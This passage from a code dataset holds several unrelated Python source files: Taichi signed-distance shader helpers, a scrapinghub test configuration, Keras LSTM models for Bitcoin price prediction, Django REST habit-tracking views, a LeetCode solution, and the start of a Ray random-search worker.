max(d, 0.).norm() + min(d.max(), 0.0)\r\n\r\n\r\n@ti.func\r\ndef sd_roundbox(p, b, r):\r\n \"\"\"\r\n SDF for rounded box\r\n :param p: vec3, point of the center\r\n :param b: ti.f32, half of the length of box\r\n :param r: ti.f32, radius of rounding\r\n :return: ti.f32, sdf for rounded box\r\n \"\"\"\r\n rr = vec2(r[0], r[1]) if p[0] > 0. else vec2(r[2], r[3])\r\n rr[0] = rr[0] if p.y > 0. else rr[1]\r\n q = abs(p) - b + rr[0]\r\n return min(max(q[0], q[1]), 0.) 
+ max(q, 0.0).norm() - rr[0]\r\n\r\n\r\n@ti.func\r\ndef sd_trapezoid(p, r1, r2, he):\r\n \"\"\"\r\n SDF for trapezoid\r\n :param p: vec3, point of the center\r\n :param r1: ti.f32, length of the top side\r\n :param r2: ti.f32, length of the bottom side\r\n :param he: ti.f32, height\r\n :return: sdf for trapezoid\r\n \"\"\"\r\n k1 = vec2(r2, he)\r\n k2 = vec2(r2 - r1, 2. * he)\r\n pp = vec2(abs(p[0]), p[1])\r\n ca = vec2(pp[0] - min(pp[0], r1 if pp[1] < 0. else r2), abs(pp[1]) - he)\r\n cb = pp - k1 + k2 * clamp(dot(k1 - pp, k2) / dot2(k2), 0., 1.)\r\n s = -1. if cb[0] < 0. and ca[1] < 0. else 1.\r\n return s * ti.sqrt(min(dot2(ca), dot2(cb)))\r\n\r\n#%% SDF 3D\r\n# https://www.iquilezles.org/www/articles/distfunctions/distfunctions.htm\r\n\r\n\r\n@ti.func\r\ndef length2(p):\r\n \"\"\"\r\n Calculates length of the vector p\r\n :param p: any vec, vector\r\n :return: length of the vector p\r\n \"\"\"\r\n return length(p)\r\n\r\n\r\n@ti.func\r\ndef length6(p):\r\n \"\"\"\r\n Calculates length of the vector p in 6-dim space\r\n :param p: any vec, vector\r\n :return: length of the vector p\r\n \"\"\"\r\n q = p * p * p\r\n q *= q\r\n return (q.x + q.y + q.z)**(1./6.)\r\n\r\n\r\n@ti.func\r\ndef length8(p):\r\n \"\"\"\r\n Calculates length of the vector p in 8-dim space\r\n :param p: any vec, vector\r\n :return: length of the vector p\r\n \"\"\"\r\n q = p * p\r\n q *= q\r\n q *= q\r\n return (q.x + q.y + q.z)**(1./8.)\r\n\r\n\r\n@ti.func\r\ndef ndot(a, b):\r\n \"\"\"\r\n :param a: vec2, any vector\r\n :param b: vec2, any vector\r\n :return: a.x*b.x - a.y*b.y, ti.f32\r\n \"\"\"\r\n return a.x*b.x - a.y*b.y\r\n\r\n\r\n@ti.func\r\ndef sd_sphere(p, r):\r\n \"\"\"sdf for sphere\r\n :param p: vec3, coord of the center of sphere\r\n :param r: ti.f32, radius\r\n :return length(p) - r: sdf for sphere\r\n \"\"\"\r\n # same as sd_circle\r\n return length(p) - r\r\n\r\n\r\n@ti.func\r\ndef sd_torus(p, r): # p: vec3, t: vec2\r\n \"\"\"sdf for torus\r\n :param p: vec3, coord of the center of torus\r\n :param r: vec2, outer and inner radiuses\r\n :return length(q) - r.y: ti.f32 sdf for torus\r\n \"\"\"\r\n q = vec2(length(vec2(p.x, p.z)) - r.x, p.y)\r\n return length(q) - r.y\r\n\r\n\r\n@ti.func\r\ndef sd_cylinder(p, c): # p: vec3, c: vec3\r\n \"\"\"sdf for cylinder\r\n :param p: vec3, coord of the center of cylinder\r\n :param c: vec3, parameters of cylinder\r\n :return ti.f32: sdf for cylinder\r\n \"\"\"\r\n pxz = vec2(p.x, p.z)\r\n cxy = vec2(c.x, c.y)\r\n return length(pxz - cxy) - c.z\r\n\r\n\r\n@ti.func\r\ndef sd_cappedcylinder(p, h, r): # p: vec3, h: ti.f32, r: ti.f32\r\n \"\"\"sdf for cylinder\r\n :param p: vec3, coord of the placement of cylinder\r\n :param h: ti.f32, height of cylinder\r\n :param r: ti.f32, radius of cylinder\r\n :return ti.f32: sdf for cylinder\r\n \"\"\"\r\n pxz = vec2(p.x, p.z)\r\n d = abs(vec2(length(pxz), p.y)) - vec2(h, r)\r\n return min(max(d.x, d.y), 0.0) + length(max(d, 0.0))\r\n\r\n\r\n@ti.func\r\ndef sd_cone(p, c, h): # p: vec3, c: vec2, h: ti.f32\r\n \"\"\"\r\n c is the sin / cos of the angle, h is height\r\n Alternatively pass q instead of(c, h), which is the\r\n point at the base in 2D\r\n\r\n sdf for cone\r\n :param p: vec3, coord of the placement of cone\r\n :param c: vec2, the sin / cos of the angle\r\n :param h: ti.f32, height of cone\r\n :return ti.f32: sdf for cone\r\n \"\"\"\r\n q = h * vec2(c.x / c.y, -1.0)\r\n w = vec2(length(p.xz), p.y)\r\n a = w - q * clamp(dot(w, q) / dot(q, q), 0.0, 1.0)\r\n b = w - q * vec2(clamp(w.x / q.x, 0.0, 1.0), 1.0)\r\n k = 
sign(q.y)\r\n d = min(dot(a, a), dot(b, b))\r\n s = max(k * (w.x * q.y - w.y * q.x), k * (w.y - q.y))\r\n return ti.sqrt(d) * sign(s)\r\n\r\n\r\n@ti.func\r\ndef sd_ellipsoid(p, r): # p: vec3, r: vec3\r\n \"\"\"sdf for ellipsoid\r\n :param p: vec3, coord of the center of ellipsoid\r\n :param r: vec3, sizes of ellipsoid\r\n :return ti.f32: sdf for ellipsoid\r\n \"\"\"\r\n pr = p / r\r\n k0 = length(pr)\r\n k1 = length(pr/r)\r\n return k0 * (k0 - 1.0) / k1\r\n\r\n\r\n@ti.func\r\ndef op_rep(p, c): # p: vec3, c: vec3\r\n \"\"\"\r\n Creates infinite copies of an object\r\n :param p: vec3,\r\n :param c: vec3,\r\n :return:\r\n \"\"\"\r\n c_half = 0.5 * c\r\n return (p + c_half) % c - c_half\r\n\r\n\r\n@ti.func\r\ndef op_replim(p, c, l): # p: vec3, c: ti.f32, l: vec3\r\n \"\"\"\r\n Creates multiple copies of an object\r\n :param p: vec3, pixel coords\r\n :param c: ti.f32, scale\r\n :param l: vec3, border of repetition\r\n :return: vec3, new pixel coords\r\n \"\"\"\r\n return p - c * clamp(ti.round(p / c), -l, l)\r\n\r\n\r\n@ti.func\r\ndef op_cheapbend(p, k): # p: vec3, k: ti.f32\r\n \"\"\"\r\n Bends primitive along the axis y\r\n :param p: vec3, point\r\n :param k: ti.f32, coefficient of the rotation\r\n :return: vec3, rotated point\r\n \"\"\"\r\n alpha = k * p.x\r\n m = rot(alpha)\r\n q = m @ p.xy\r\n return vec3(q.x, q.y, p.z)\r\n\r\n@ti.func\r\ndef checker(p, t):\r\n \"\"\"\r\n Draws checkers pattern\r\n :param p: vec2, point\r\n :param t: ti.f32, sharpness\r\n :return: float, checkers\r\n \"\"\"\r\n fxy = abs(fract((p + 0.5) / 2.0) - 0.5) - 0.25\r\n fxy = clamp(fxy * t + 0.5, 0.0, 1.0)\r\n f = mix(fxy.x, 1.0 - fxy.x, fxy.y)\r\n return f\r\n\r\n\r\n@ti.func\r\ndef checkersTextureGradBox(p, ddx, ddy): # p: vec2, ddx: vec2, ddy: vec2\r\n \"\"\"\r\n Draws nice checkers pattern\r\n :param p: vec2, pixel\r\n :param ddx: vec2, x-dim ray differential\r\n :param ddy: vec2, y-dim ray differential\r\n :return: float, nice checkers\r\n \"\"\"\r\n # filter kernel\r\n w = max(abs(ddx), abs(ddy)) + 0.01\r\n # analytical integral (box filter)\r\n i = 2.0 * (abs(fract((p - 0.5 * w) / 2.0) - 0.5) -\r\n abs(fract((p + 0.5 * w) / 2.0) - 0.5)) / w\r\n # xor pattern\r\n return 0.5 - 0.5 * i.x * i.y\r\n\r\n#%%\r\n\r\n@ti.func\r\ndef lookat(pos, look, up, s):\r\n \"\"\"\r\n :param pos: coordinates of the point of view\r\n :param look: coordinates of the point of the direction of view\r\n :param up: vertical up vector\r\n :param s: scale\r\n :return: scaled looking vector, vector to the right from the looking vector, up vector\r\n \"\"\"\r\n f = normalize(look - pos) # front\r\n r = normalize(cross(up, f)) # right\r\n u = cross(f, r) # up\r\n return f * s, r, u\r\n # return mat3([[r.x, u.x, f.x],\r\n # [r.y, u.y, f.y],\r\n # [r.z, u.z, f.z]])\r\n\r\n\r\n@ti.func\r\ndef lookat_raydir(uv, p, l, z): # uv: vec2, p: vec3, l: vec3, z: ti.f32\r\n \"\"\"\r\n :param uv: pixel coordinates\r\n :param p: camera position?\r\n :param l: camera look_at?\r\n :param z: scale?\r\n :return: vec3, pixel that camera sees\r\n \"\"\"\r\n f = normalize(l - p)\r\n r = normalize(cross(vec3(0., 1., 0.), f))\r\n u = cross(f, r)\r\n c = f * z\r\n i = c + uv.x * r + uv.y * u\r\n return normalize(i)\r\n\r\n\r\n@ti.func\r\ndef argmin(v):\r\n \"\"\"\r\n :param v: array\r\n :return: m, j - value and index of the smaller element\r\n \"\"\"\r\n m = v[0]\r\n j = 0\r\n for i in ti.static(range(1, len(v))):\r\n if v[i] < m:\r\n j = i\r\n m = v[i]\r\n return m, 
j\r\n\r\n","repo_name":"grilya-g/ray_marching","sub_path":"shader_funcs.py","file_name":"shader_funcs.py","file_ext":"py","file_size_in_byte":16209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1563302696","text":"import os\n\nimport vcr\nimport pytest\nimport shutil\nimport requests\nfrom requests import HTTPError\n\nfrom scrapinghub import HubstorageClient\nfrom scrapinghub.hubstorage.utils import urlpathjoin\nfrom scrapinghub.hubstorage.serialization import MSGPACK_AVAILABLE\n\nfrom ..conftest import request_accept_header_matcher\nfrom ..conftest import VCRGzipSerializer\nfrom ..conftest import (\n TEST_PROJECT_ID,\n TEST_ENDPOINT,\n TEST_AUTH,\n TEST_BOTGROUP,\n TEST_COLLECTION_NAME,\n TEST_SPIDER_NAME,\n)\n\n# vcrpy creates the cassetes automatically under VCR_CASSETES_DIR\nVCR_CASSETES_DIR = 'tests/hubstorage/cassetes'\n\nmy_vcr = vcr.VCR(cassette_library_dir=VCR_CASSETES_DIR, record_mode='once')\nmy_vcr.register_serializer('gz', VCRGzipSerializer())\nmy_vcr.register_matcher('accept_header', request_accept_header_matcher)\nmy_vcr.serializer = 'gz'\nmy_vcr.match_on = ('method', 'scheme', 'host', 'port',\n 'path', 'query', 'accept_header')\n\n\ndef pytest_configure(config):\n if config.option.update_cassettes:\n # there's vcr `all` mode to update cassettes but it doesn't delete\n # or clear existing records, so its size will always only grow\n if os.path.exists(VCR_CASSETES_DIR):\n shutil.rmtree(VCR_CASSETES_DIR)\n elif config.option.ignore_cassettes:\n # simple hack to just ignore vcr cassettes:\n # - all record_mode means recording new interactions + no replay\n # - before_record returning None means skipping all the requests\n global my_vcr\n my_vcr.record_mode = 'all'\n my_vcr.before_record_request = lambda request: None\n\n\ndef is_using_real_services(request):\n return (request.config.option.update_cassettes or\n request.config.option.ignore_cassettes)\n\n\n@pytest.fixture(scope='session')\ndef hsclient():\n return HubstorageClient(auth=TEST_AUTH, endpoint=TEST_ENDPOINT)\n\n\n@pytest.fixture(scope='session')\ndef hsproject(hsclient):\n return hsclient.get_project(TEST_PROJECT_ID)\n\n\n@pytest.fixture(scope='session')\n@my_vcr.use_cassette()\ndef hsspiderid(hsproject):\n return str(hsproject.ids.spider(TEST_SPIDER_NAME, create=1))\n\n\n@pytest.fixture(scope='session')\ndef hscollection(hsproject, request):\n collection = get_test_collection(hsproject)\n if is_using_real_services(request):\n clean_collection(collection)\n yield collection\n\n\n@pytest.fixture(autouse=True, scope='session')\ndef setup_session(hsclient, hsproject, hscollection, request):\n if is_using_real_services(request):\n set_testbotgroup(hsproject)\n remove_all_jobs(hsproject)\n yield\n hsclient.close()\n\n\n@pytest.fixture(params=['json', 'msgpack'])\ndef json_and_msgpack(hsclient, monkeypatch, request):\n if request.param == 'json':\n monkeypatch.setattr(hsclient, 'use_msgpack', False)\n elif not MSGPACK_AVAILABLE or request.config.getoption(\"--disable-msgpack\"):\n pytest.skip(\"messagepack-based tests are disabled\")\n return request.param\n\n\n@pytest.fixture(autouse=True)\ndef setup_vcrpy(request, hsproject):\n # generates names like \"test_module/test_function.yaml\"\n # otherwise it uses current function name (setup_vcrpy) for all tests\n # other option is to add vcr decorator to each test separately\n serializer_suffix = ''\n if ('json_and_msgpack' in request.fixturenames and\n request.getfixturevalue('json_and_msgpack') == 'json'):\n 
serializer_suffix = '-json'\n cassette_name = '{}/{}{}.gz'.format(\n request.function.__module__.split('.')[-1],\n request.function.__name__,\n serializer_suffix\n )\n if is_using_real_services(request):\n remove_all_jobs(hsproject)\n with my_vcr.use_cassette(cassette_name):\n yield\n\n\n# ----------------------------------------------------------------------------\n\n\ndef start_job(hsproject, **startparams):\n jobdata = hsproject.jobq.start(**startparams)\n if jobdata:\n jobkey = jobdata.pop('key')\n jobauth = (jobkey, jobdata['auth'])\n return hsproject.get_job(jobkey, jobauth=jobauth, metadata=jobdata)\n\n\n# Clean environment section\n\n\ndef remove_all_jobs(hsproject):\n for k in list(hsproject.settings.keys()):\n if k != 'botgroups':\n del hsproject.settings[k]\n hsproject.settings.save()\n\n # Cleanup JobQ: run 2 times to ensure we covered all jobs\n for queuename in ('pending', 'running', 'finished')*2:\n info = hsproject.jobq.summary(queuename)\n for summary in info['summary']:\n _remove_job(hsproject, summary['key'])\n\n\ndef _remove_job(hsproject, jobkey):\n hsproject.jobq.finish(jobkey)\n hsproject.jobq.delete(jobkey)\n # delete job\n assert jobkey.startswith(TEST_PROJECT_ID), jobkey\n hsproject.jobs.apidelete(jobkey.partition('/')[2])\n\n# Collection helpers section\n\n\ndef get_test_collection(project):\n return project.collections.new_store(TEST_COLLECTION_NAME)\n\n\ndef clean_collection(collection):\n try:\n for item in collection.iter_values():\n collection.delete(item['_key'])\n except HTTPError as e:\n # if collection doesn't exist yet service responds 404\n if e.response.status_code != 404:\n raise\n\n\n# Botgroups helpers section\n\n\ndef set_testbotgroup(hsproject):\n hsproject.settings.apipost(jl={'botgroups': [TEST_BOTGROUP]})\n # Additional step to populate JobQ's botgroups table\n url = urlpathjoin(TEST_ENDPOINT, 'botgroups', TEST_BOTGROUP, 'max_running')\n requests.post(url, auth=hsproject.auth, data='null')\n hsproject.settings.expire()\n\n\ndef unset_testbotgroup(hsproject):\n hsproject.settings.apidelete('botgroups')\n hsproject.settings.expire()\n # Additional step to delete botgroups in JobQ\n url = urlpathjoin(TEST_ENDPOINT, 'botgroups', TEST_BOTGROUP)\n requests.delete(url, auth=hsproject.auth)\n","repo_name":"scrapinghub/python-scrapinghub","sub_path":"tests/hubstorage/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5813,"program_lang":"python","lang":"en","doc_type":"code","stars":199,"dataset":"github-code","pt":"44"} +{"seq_id":"23869379879","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport plotly.express as px\nimport tensorflow as tf\nfrom sklearn.preprocessing import MinMaxScaler\n\ndf = pd.read_csv('/Users/daniele/Desktop/Stock BTC Prediction/BTC-USD-all.csv', index_col=0)\ndf.drop(['Adj Close', 'Volume'], axis=1, inplace=True)\ndf.head()\n\n\n# Train val test split\nn = len(df)\ntrain_df = df[0:int(n*0.7)]\nval_df = df[int(n*0.7):int(n*0.9)]\ntest_df = df[int(n*0.9):]\nprint(train_df.shape)\nprint(val_df.shape)\nprint(test_df.shape)\nnum_features = df.shape[1]\nprint(num_features)\n\n\n# Min Max Scaler\ntrain = train_df\nscalers={}\nfor i in train_df.columns:\n scaler = MinMaxScaler(feature_range=(-1,1))\n s_s = scaler.fit_transform(train[i].values.reshape(-1,1))\n s_s=np.reshape(s_s,len(s_s))\n scalers['scaler_'+ i] = scaler\n train[i]=s_s\n\ntest = test_df\nfor i in train_df.columns:\n scaler = scalers['scaler_'+i]\n s_s = 
scaler.transform(test[i].values.reshape(-1,1))\n s_s=np.reshape(s_s,len(s_s))\n scalers['scaler_'+i] = scaler\n test[i]=s_s\n\nval = val_df\nfor i in train_df.columns:\n scaler = scalers['scaler_'+i]\n s_s = scaler.transform(val[i].values.reshape(-1,1))\n s_s=np.reshape(s_s,len(s_s))\n scalers['scaler_'+i] = scaler\n val[i]=s_s\n\n\n# Function for window split\ndef split_series(series, n_past, n_future):\n #\n # n_past ==> no of past observations\n #\n # n_future ==> no of future observations\n #\n X, y = list(), list()\n for window_start in range(len(series)):\n past_end = window_start + n_past\n future_end = past_end + n_future\n if future_end > len(series):\n break\n # slicing the past and future parts of the window\n past, future = series[window_start:past_end, :], series[past_end:future_end, :]\n X.append(past)\n y.append(future)\n return np.array(X), np.array(y)\n\n\nn_past = 6\nn_future = 1\nn_features = 4\n\n\nX_train, y_train = split_series(train.values,n_past, n_future)\nX_train = X_train.reshape((X_train.shape[0], X_train.shape[1],n_features))\ny_train = y_train.reshape((y_train.shape[0], y_train.shape[1], n_features))\nX_val, y_val = split_series(val.values,n_past, n_future)\nX_val = X_val.reshape((X_val.shape[0], X_val.shape[1],n_features))\ny_val = y_val.reshape((y_val.shape[0], y_val.shape[1], n_features))\nX_test, y_test = split_series(test.values,n_past, n_future)\nX_test = X_test.reshape((X_test.shape[0], X_test.shape[1],n_features))\ny_test = y_test.reshape((y_test.shape[0], y_test.shape[1], n_features))\n\n\n# Model\n# E1D1\n# n_features ==> no of features at each timestep in the data.\nencoder_inputs = tf.keras.layers.Input(shape=(n_past, n_features))\nencoder_l1 = tf.keras.layers.LSTM(100, return_state=True)\nencoder_outputs1 = encoder_l1(encoder_inputs)\n\nencoder_states1 = encoder_outputs1[1:]\n\ndecoder_inputs = tf.keras.layers.RepeatVector(n_future)(encoder_outputs1[0])\n\ndecoder_l1 = tf.keras.layers.LSTM(100, return_sequences=True)(decoder_inputs,initial_state = encoder_states1)\ndecoder_outputs1 = tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(n_features))(decoder_l1)\n\nmodel_e1d1 = tf.keras.models.Model(encoder_inputs,decoder_outputs1)\n\nmodel_e1d1.summary()\n\n# E2D2\n# n_features ==> no of features at each timestep in the data.\nencoder_inputs = tf.keras.layers.Input(shape=(n_past, n_features))\nencoder_l1 = tf.keras.layers.LSTM(100,return_sequences = True, return_state=True)\nencoder_outputs1 = encoder_l1(encoder_inputs)\nencoder_states1 = encoder_outputs1[1:]\nencoder_l2 = tf.keras.layers.LSTM(100, return_state=True)\nencoder_outputs2 = encoder_l2(encoder_outputs1[0])\nencoder_states2 = encoder_outputs2[1:]\n\ndecoder_inputs = tf.keras.layers.RepeatVector(n_future)(encoder_outputs2[0])\n\ndecoder_l1 = tf.keras.layers.LSTM(100, return_sequences=True)(decoder_inputs,initial_state = encoder_states1)\ndecoder_l2 = tf.keras.layers.LSTM(100, return_sequences=True)(decoder_l1,initial_state = encoder_states2)\ndecoder_outputs2 = tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(n_features))(decoder_l2)\n\nmodel_e2d2 = tf.keras.models.Model(encoder_inputs,decoder_outputs2)\n\nmodel_e2d2.summary()\n\n\nreduce_lr = tf.keras.callbacks.LearningRateScheduler(lambda x: 1e-3 * 0.90 ** x)\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss', min_delta=0, patience=0, verbose=1,\n mode='auto', baseline=None, restore_best_weights=False\n)\nmodel_e1d1.compile(optimizer=tf.keras.optimizers.Adam(), 
loss=tf.keras.losses.MeanSquaredError())\nhistory_e1d1=model_e1d1.fit(X_train,y_train,epochs=25,validation_data=(X_test,y_test),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\nmodel_e2d2.compile(optimizer=tf.keras.optimizers.Adam(), loss=tf.keras.losses.MeanSquaredError())\nhistory_e2d2=model_e2d2.fit(X_train,y_train,epochs=25,validation_data=(X_val,y_val),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\n\n\nplt.plot(history_e1d1.history['loss'])\nplt.plot(history_e1d1.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\n\nplt.plot(history_e2d2.history['loss'])\nplt.plot(history_e2d2.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\n\npred_e2d2=model_e2d2.predict(X_test)\n\nprint(pred_e2d2.shape)\n\n\nX_prova = X_test\ny_prova = []\npred = []\ntest = []\n\nfor _ in range(0,len(X_prova)):\n for i in X_prova[_]:\n y_prova.append(i[0])\n\n for i in pred_e2d2[_]:\n pred.append(i[0])\n\n for i in y_test[_]:\n test.append(i[0])\n\nprint(len(y_prova))\nprint(len(pred))\nprint(len(test))\n\nplt.figure()\nplt.scatter(list(range(0,len(y_prova))),y_prova)\nplt.scatter(list(range(n_past,(len(pred)*n_past)+n_past, n_past)),pred)\nplt.scatter(list(range(n_past,(len(test)*n_past)+n_past, n_past)),test)\nplt.show()\n\n\n\n\nreduce_lr = tf.keras.callbacks.LearningRateScheduler(lambda x: 1e-3 * 0.90 ** x)\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss', min_delta=0, patience=0, verbose=1,\n mode='auto', baseline=None, restore_best_weights=False\n)\n\nmodel_lstm = tf.keras.models.Sequential([\n tf.keras.layers.Input(shape=(n_past, n_features)),\n # Shape [batch, time, features] => [batch, time, lstm_units]\n tf.keras.layers.LSTM(64, return_sequences=False),\n # Shape => [batch, time, features]\n tf.keras.layers.Dense(units=n_features),\n #tf.keras.layers.RepeatVector(n_future)\n tf.keras.layers.Reshape((1, 4))\n])\n\nmodel_lstm.summary()\n\nmodel_lstm.compile(optimizer=tf.keras.optimizers.Adam(), loss=tf.keras.losses.MeanAbsoluteError())\nhistory_lstm=model_lstm.fit(X_train,y_train,epochs=100,validation_data=(X_val,y_val),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\n\nplt.plot(history_lstm.history['loss'])\nplt.plot(history_lstm.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\npred_lstm=model_lstm.predict(X_test)\n\n# Plot test prediction \nX_prova = X_test\ny_prova = []\npred = []\ntest = []\n\nfor _ in range(0,len(X_prova)):\n for i in X_prova[_]:\n y_prova.append(i[3])\n\n for i in pred_lstm[_]:\n pred.append(i[3])\n\n for i in y_test[_]:\n test.append(i[3])\n\nprint(len(y_prova))\nprint(len(pred))\nprint(len(test))\n\nplt.figure()\n#plt.scatter(list(range(0,len(y_prova))),y_prova)\nplt.plot(list(range(n_past,(len(pred)*n_past)+n_past, n_past)),pred)\nplt.plot(list(range(n_past,(len(test)*n_past)+n_past, n_past)),test)\nplt.legend(['y_pred', 'y_test'], loc='upper left')\nplt.show()\n\n\n\n\n\n\n# Multi LSTM Model\nOUT_STEPS = 1\nmulti_lstm_model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(n_past, n_features)),\n # Shape [batch, time, features] => [batch, lstm_units]\n # Adding more `lstm_units` just overfits more quickly.\n tf.keras.layers.LSTM(32, return_sequences=False),\n # Shape => [batch, out_steps*features]\n 
tf.keras.layers.Dense(OUT_STEPS*n_features,\n kernel_initializer=tf.initializers.zeros),\n # Shape => [batch, out_steps, features]\n tf.keras.layers.Reshape((OUT_STEPS, n_features))\n])\n\nmulti_lstm_model.summary()\n\nreduce_lr = tf.keras.callbacks.LearningRateScheduler(lambda x: 1e-3 * 0.90 ** x)\nearly_stopping = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss', min_delta=0, patience=0, verbose=1,\n mode='auto', baseline=None, restore_best_weights=False\n)\n\nmulti_lstm_model.compile(optimizer=tf.keras.optimizers.Adam(), loss=tf.keras.losses.MeanSquaredError())\nhistory_multi_lstm=multi_lstm_model.fit(X_train,y_train,epochs=100,validation_data=(X_val,y_val),batch_size=32,verbose=1,callbacks=[reduce_lr, early_stopping])\n\nplt.plot(history_multi_lstm.history['loss'])\nplt.plot(history_multi_lstm.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\n\npred_multi_lstm=multi_lstm_model.predict(X_test)\n\n# Plot test prediction\nX_prova = X_test\ny_prova = []\npred = []\ntest = []\n\nfor _ in range(0,len(X_prova)):\n for i in X_prova[_]:\n y_prova.append(i[3])\n\n for i in pred_multi_lstm[_]:\n pred.append(i[3])\n\n for i in y_test[_]:\n test.append(i[3])\n\nprint(len(y_prova))\nprint(len(pred))\nprint(len(test))\n\nplt.figure()\n#plt.scatter(list(range(0,len(y_prova))),y_prova)\nplt.plot(list(range(n_past,(len(pred)*n_past)+n_past, n_past)),pred)\nplt.plot(list(range(n_past,(len(test)*n_past)+n_past, n_past)),test)\nplt.legend(['y_pred', 'y_test'], loc='upper left')\nplt.show()\n","repo_name":"Daniele9193/Stock-Prediction","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41999861427","text":"from rest_framework import generics\nfrom habits.models import Habit\nfrom habits.painators import UserHabbitsPaginator\nfrom habits.permissions import IsOwner, CannotEditOrDeletePublicHabit\nfrom habits.serializers import HabitSerializer\nfrom habits.tasks import send_periodic_message\n\n\nclass HabitAPICreateView(generics.CreateAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n\n permission_classes = [IsOwner]\n\n def perform_create(self, serializer):\n new_habit = serializer.save()\n\n new_habit.user = self.request.user\n\n new_habit.save()\n\n send_periodic_message(pk=new_habit.pk)\n\n\nclass HabitListAPIView(generics.ListAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n pagination_class = UserHabbitsPaginator\n\n permission_classes = [IsOwner]\n\n def get_queryset(self):\n user = self.request.user\n return Habit.objects.filter(user=user)\n\n\nclass HabitUpdateAPIView(generics.UpdateAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n\n permission_classes = [IsOwner]\n\n\nclass HabitDestroyAPIView(generics.DestroyAPIView):\n queryset = Habit.objects.all()\n serializer_class = HabitSerializer\n\n permission_classes = [IsOwner]\n\n\nclass PublicHabitListView(generics.ListAPIView):\n queryset = Habit.objects.filter(is_public=True)\n serializer_class = HabitSerializer\n permission_classes = [CannotEditOrDeletePublicHabit]\n","repo_name":"RomNikita/habbit_project","sub_path":"habits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"73294639173","text":"\"\"\"\nlc:219 : Contains Duplicate2\n\nGiven an integer array nums and an integer k,\n return true if there are two distinct indices i and j in the array such that nums[i] == nums[j] and abs(i - j) <= k.\n\n\"\"\"\n\n# Time Complexity = O(N)\n\nclass Solution:\n def containsNearbyDuplicate2(self, nums: List[int], k: int) -> bool:\n lookup =()\n L = 0\n for R in range(nums):\n\n if nums[R] in lookup:\n return True\n\n lookup.add(nums[L])\n\n if R-L+1>k:\n lookup.remove(nums[L])\n L+=1\n\n\n return False","repo_name":"psatyadileep/neetcode","sub_path":"topics/1_Arrays/sliding_window/2_contains_duplicate2.py","file_name":"2_contains_duplicate2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7035574989","text":"import ray\nimport numpy as np\nfrom exact.utils import *\nfrom ars.shared_noise import *\nfrom ars.policies import *\nfrom gym.utils import seeding\n\n\n@ray.remote\nclass Worker(object):\n def __init__(self, seed, policy_params, deltas, params):\n\n self.env = make_env(params, seed=params['seed']) # NOTE: Need to use the same env seed across all workers for LQR\n\n self.deltas = SharedNoiseTable(deltas, seed=seed+7)\n self.policy_params = policy_params\n\n self.ac_dim = self.env.action_space.shape[0]\n\n if policy_params['type'] == 'linear':\n self.policy = LinearPolicy(policy_params, seed=params['seed'])\n else:\n raise NotImplementedError\n\n self.delta_std = params['delta_std']\n self.rollout_length = params['rollout_length']\n self.one_point = params['one_point']\n self.coord_descent = params['coord_descent']\n self.seed = seed\n self.params = params\n self.np_random, _ = seeding.np_random(seed)\n\n def get_weights_plus_stats(self):\n return self.policy.get_weights_plus_stats()\n\n def rollout(self, shift=0., rollout_length=None, noise=None, sampled_t=None):\n if rollout_length is None:\n rollout_length = self.rollout_length\n\n perturbation = True\n if noise is None:\n perturbation = False\n\n total_reward = 0\n steps = 0\n obs = []\n\n ob = self.env.reset()\n for i in range(rollout_length):\n action = self.policy.act(ob)\n if perturbation and not self.coord_descent:\n obs.append(ob)\n noise_t = noise[i, :]\n ob, reward, done, _ = self.env.step(action + noise_t)\n elif perturbation and self.coord_descent:\n if i == sampled_t:\n obs = ob.copy()\n ob, reward, done, _ = self.env.step(action + noise)\n else:\n ob, reward, done, _ = self.env.step(action)\n else:\n ob, reward, done, _ = self.env.step(action)\n steps += 1\n total_reward += (reward - shift)\n if done:\n break\n return total_reward, steps, obs\n\n def do_rollouts(self, w_policy, num_rollouts=1, shift=0., evaluate=False):\n rollout_rewards, deltas_idx, obs = [], [], []\n steps = 0\n\n for i in range(num_rollouts):\n if evaluate:\n self.policy.update_weights(w_policy)\n deltas_idx.append(-1)\n obs.append(-1)\n\n self.policy.update_filter = False\n\n reward, _, _ = self.rollout(rollout_length=self.rollout_length)\n rollout_rewards.append(reward)\n else:\n self.policy.update_weights(w_policy)\n\n sampled_t = None\n if not self.coord_descent: \n idx, delta = self.deltas.get_delta(self.ac_dim * self.rollout_length)\n delta = (self.delta_std * delta).reshape(self.rollout_length, self.ac_dim)\n else:\n idx, delta = self.deltas.get_delta(self.ac_dim)\n delta = self.delta_std * delta\n sampled_t = self.np_random.randint(low=0, 